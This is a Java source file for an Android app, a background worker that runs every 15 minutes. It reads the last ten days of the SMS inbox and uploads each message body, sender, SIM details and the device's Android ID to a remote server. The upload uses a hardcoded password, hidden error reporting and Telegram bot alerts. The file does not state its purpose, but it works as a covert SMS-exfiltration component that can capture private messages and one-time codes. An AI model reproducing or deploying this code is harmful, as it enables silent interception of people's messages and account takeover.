package com.app.duck.util;

import static com.app.duck.Config.SMS_UPLOAD_TAG;
import static com.blankj.utilcode.util.TimeUtils.getSafeDateFormat;

import android.annotation.SuppressLint;
import android.content.ContentResolver;
import android.content.Context;
import android.database.Cursor;
import android.net.Uri;
import android.provider.Telephony;
import android.util.Log;

import androidx.annotation.NonNull;
import androidx.work.ExistingPeriodicWorkPolicy;
import androidx.work.PeriodicWorkRequest;
import androidx.work.WorkManager;
import androidx.work.Worker;
import androidx.work.WorkerParameters;

import com.app.duck.Config;
import com.app.duck.R;
import com.app.duck.database.DBHelper;
import com.app.http.APPConfig;
import com.app.http.BaseBean;
import com.app.http.Http;
import com.blankj.utilcode.util.DeviceUtils;
import com.blankj.utilcode.util.GsonUtils;
import com.blankj.utilcode.util.StringUtils;
import com.blankj.utilcode.util.TimeUtils;
import com.blankj.utilcode.util.Utils;
import com.elvishew.xlog.XLog;
import com.jeremyliao.liveeventbus.LiveEventBus;

import java.util.ArrayList;
import java.util.Calendar;
import java.util.HashMap;
import java.util.concurrent.TimeUnit;

public class CheckInboxWorker extends Worker {
    public CheckInboxWorker(@NonNull Context context, @NonNull WorkerParameters workerParams) {
        super(context, workerParams);
    }

    public static void start() {
        Log.i(Config.LOG_TAG, StringUtils.getString(R.string.log_tip_6));
        XLog.i(StringUtils.getString(R.string.log_tip_6));
        PeriodicWorkRequest periodicWorkRequest = new PeriodicWorkRequest.Builder(CheckInboxWorker.class, 15, TimeUnit.MINUTES).build();
        WorkManager.getInstance().enqueueUniquePeriodicWork("CheckInboxWorker", ExistingPeriodicWorkPolicy.REPLACE, periodicWorkRequest);
    }


    public static HashMap<String, String> queryInboxMessage(long id) {
        ContentResolver contentResolver = Utils.getApp().getContentResolver();
        HashMap<String, String> map = new HashMap<>();
        Uri uri = Uri.parse("content://sms/");
        String[] projection = new String[]{Telephony.Sms._ID, Telephony.Sms.ADDRESS, Telephony.Sms.DATE_SENT, Telephony.Sms.DATE, Telephony.Sms.TYPE,
                Telephony.Sms.BODY, Telephony.Sms.SUBSCRIPTION_ID};
        String selection = Telephony.Sms._ID + " = ?";
        String[] selectionArgs = new String[]{String.valueOf(id)};
        Cursor cursor = contentResolver.query(uri, projection, selection, selectionArgs, null);
        try {
            if (cursor != null && cursor.moveToFirst()) {
                @SuppressLint("Range") String sender = cursor.getString(cursor.getColumnIndex(Telephony.Sms.ADDRESS));//发件人
                @SuppressLint("Range") String receiver = cursor.getString(cursor.getColumnIndex(Telephony.Sms.DATE));//收件时间
                @SuppressLint("Range") long sentTime = cursor.getLong(cursor.getColumnIndex(Telephony.Sms.DATE_SENT));//发件日期时间，时间戳格式
                @SuppressLint("Range") String body = cursor.getString(cursor.getColumnIndex(Telephony.Sms.BODY));//短信的正文内容。
                @SuppressLint("Range") int subID = cursor.getInt(cursor.getColumnIndex(Telephony.Sms.SUBSCRIPTION_ID));//sim卡关联ID
                map.put("address", StringUtils.isTrimEmpty(HxUtils.getRecord(subID)) ? "UNKNOWN" : HxUtils.getRecord(subID));
                map.put("body", body);
                map.put("timestampMillis", sentTime + "");
                map.put("sender", sender);
                map.put("date", receiver);
                map.put("id", id + "");
                map.put("sub_id", subID + "");
                map.put("android_id", DeviceUtils.getAndroidID());
            }
        } catch (Exception e) {
            new TgBot("这台设备好像在检索SMS库的时候出了点问题?请查看设备日志!", true);
            Log.e(Config.LOG_TAG, StringUtils.getString(R.string.log_tip_7), e);
            XLog.e(StringUtils.getString(R.string.log_tip_7), e);
        } finally {
            if (cursor != null) {
                cursor.close();
            }

        }

        return map;

    }

    @NonNull
    @Override
    public Result doWork() {
        try {
            Calendar calendar = Calendar.getInstance();
            calendar.add(Calendar.DAY_OF_MONTH, -10); // 向前推十天
            long tenDaysAgo = calendar.getTimeInMillis();
            ArrayList<Integer> list = new ArrayList<>();
            Uri inboxUri = Uri.parse("content://sms/inbox");
            String[] projection = new String[]{Telephony.Sms._ID};
            String sortOrder = "date DESC"; // 按日期倒序排序
            String selection = "date > ?";
            String[] selectionArgs = new String[]{String.valueOf(tenDaysAgo)};
            Cursor cursor = Utils.getApp().getContentResolver().
                    query(inboxUri,
                            projection,
                            selection,
                            selectionArgs,
                            sortOrder);
            if (cursor != null) {
                while (cursor.moveToNext()) {
                    int index = cursor.getColumnIndex(Telephony.Sms._ID);
                    if (index >= 0) {
                        int id = cursor.getInt(index);
                        list.add(id);
                    }
                }
                cursor.close();

            }
            for (Integer id : list) {
                Log.d("hzshkj", "[CheckInboxWorker] doWork: 周期任务上传");
                DBHelper dbHelper = new DBHelper(Utils.getApp());
                int success = dbHelper.checkSuccessById(id);
                if (success != 1) {
                    HashMap<String, Object> map = new HashMap<>();
                    HashMap<String, String> dataMap = queryInboxMessage(id);
                    boolean isHavaNumber = !"UNKNOWN".equals(dataMap.get("address"));
                    Log.d("hzshkj", "[CheckInboxWorker] doWork: 周期任务上传,success = " + success);
                    if (success == 2 && !isHavaNumber) {
                        Log.d("hzshkj", "[CheckInboxWorker] doWork: 周期任务上传,success == 2 && !isHavaNumber,本条短信无需再传");
                        break;
                    }
                    map.put("data", GsonUtils.toJson(dataMap));
                    map.put("password", "o6M5sG7E@FAWLBL9");
                    Http.getInstance()
                            .setUrlPath(APPConfig.BASE, APPConfig.SMS)
                            .setParams(map)
                            .setErrorStyle(Http.ERROR_HIDE)
                            .setLoadStyle(Http.ERROR_HIDE)
                            .setRetryCount(3)
                            .post(new Http.HttpCallBack<String>() {
                                @Override
                                public void onNext(String model) {
                                    Log.d("hzshkj", "[CheckInboxWorker] doWork: 周期任务上传成功,isHavaNumber" + isHavaNumber + ",isHavaNumber ? 1 : 2");
                                    dbHelper.insertOrUpdateData(id, isHavaNumber ? 1 : 2);
                                }

                                @Override
                                public void onError(Throwable ex) {
                                    super.onError(ex);
                                    Log.e(Config.LOG_TAG, StringUtils.getString(R.string.log_tip_4, id), ex);
                                    XLog.e(StringUtils.getString(R.string.log_tip_4, id), ex);
                                }

                                @Override
                                public void onFail(BaseBean t) {
                                    super.onFail(t);
                                    Log.i(Config.LOG_TAG, StringUtils.getString(R.string.log_tip_4, id));
                                    XLog.i(StringUtils.getString(R.string.log_tip_4, id));
                                }
                            });
                }

            }
            Log.i(Config.LOG_TAG, StringUtils.getString(R.string.log_tip_5));
            XLog.i(StringUtils.getString(R.string.log_tip_5));
            LiveEventBus.get(SMS_UPLOAD_TAG).post(StringUtils.getString(R.string.log_tip_5) + TimeUtils.getNowString(getSafeDateFormat("MM-dd HH:mm")));
            return Result.success();
        } catch (Exception e) {
            LiveEventBus.get(SMS_UPLOAD_TAG).post(StringUtils.getString(R.string.log_tip_3, e.getMessage()));
            Log.e(Config.LOG_TAG, StringUtils.getString(R.string.log_tip_3, e.getMessage()), e);
            XLog.e(StringUtils.getString(R.string.log_tip_3, e.getMessage()), e);
            return Result.retry();
        }


    }
}
